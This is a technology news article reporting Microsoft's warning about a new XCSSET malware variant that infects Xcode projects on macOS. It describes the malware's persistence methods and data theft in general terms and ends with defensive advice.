Microsoft warns of new, sophisticated malware targeting macOS developers | Technology News
Xcode, Apple’s integrated development environment for building software tools on Mac devices, is being targeted by sophisticated malware, according to Microsoft.
Microsoft Threat Intelligence said on Monday, February 17, that it has uncovered a new variant of macOS malware known as XCSSET that targets users by infecting developers’ projects on Xcode.
“While we’re only seeing this new XCSSET variant in limited attacks at this time, we’re sharing this information so users and organizations can protect themselves against this threat,” the company’s security research team said in a post on X.
This particular family of malware was first flagged in 2022, and it allows threat actors to target digital wallets, collect data from the Notes app, and exfiltrate system information and files from compromised devices.
The latest XCSSET malware is reportedly deployed using zero-day vulnerabilities. It uses two new strategies to infect macOS devices with malicious code.
The first technique is known as the “zshrc” method, where the malware creates a file named ~/.zshrc_aliases which contains the payload. “It then appends a command in the ~/.zshrc file to ensure that the created file is launched every time a new shell session is initiated, guaranteeing the malware’s persistence across shell sessions,” Microsoft Threat Intelligence said.
An unsecure shell session can let attackers gain unauthorised access to a system and execute commands remotely.
Story continues below this ad
The XCSSET malware can also infect devices using the dock method. This technique involves downloading a tool to manage applications on the dock, which is the bar located at the bottom of the macOS screen on Apple computers.
“The malware then creates a fake Launchpad application and replaces the legitimate Launchpad’s path entry in the dock with this fake one. This ensures that every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed,” Microsoft said.
The new XCSSET variant is also hard to detect as it “uses a significantly more randomised approach for generating payloads to infect Xcode projects.”
“Both its encoding technique and number of encoding iterations are randomized. […] At its code level, the variant’s module names are also obfuscated, making it more challenging to determine the modules’ intent,” the cybersecurity researchers said.
Story continues below this ad
In order to check if your Mac has been infected with the latest XCSSET malware variant, Microsoft recommended using its Defender tool for Endpoint on Mac.
“Users must always inspect and verify any Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects. They should also only install apps from trusted sources, such as a software platform’s official app store,” it said.
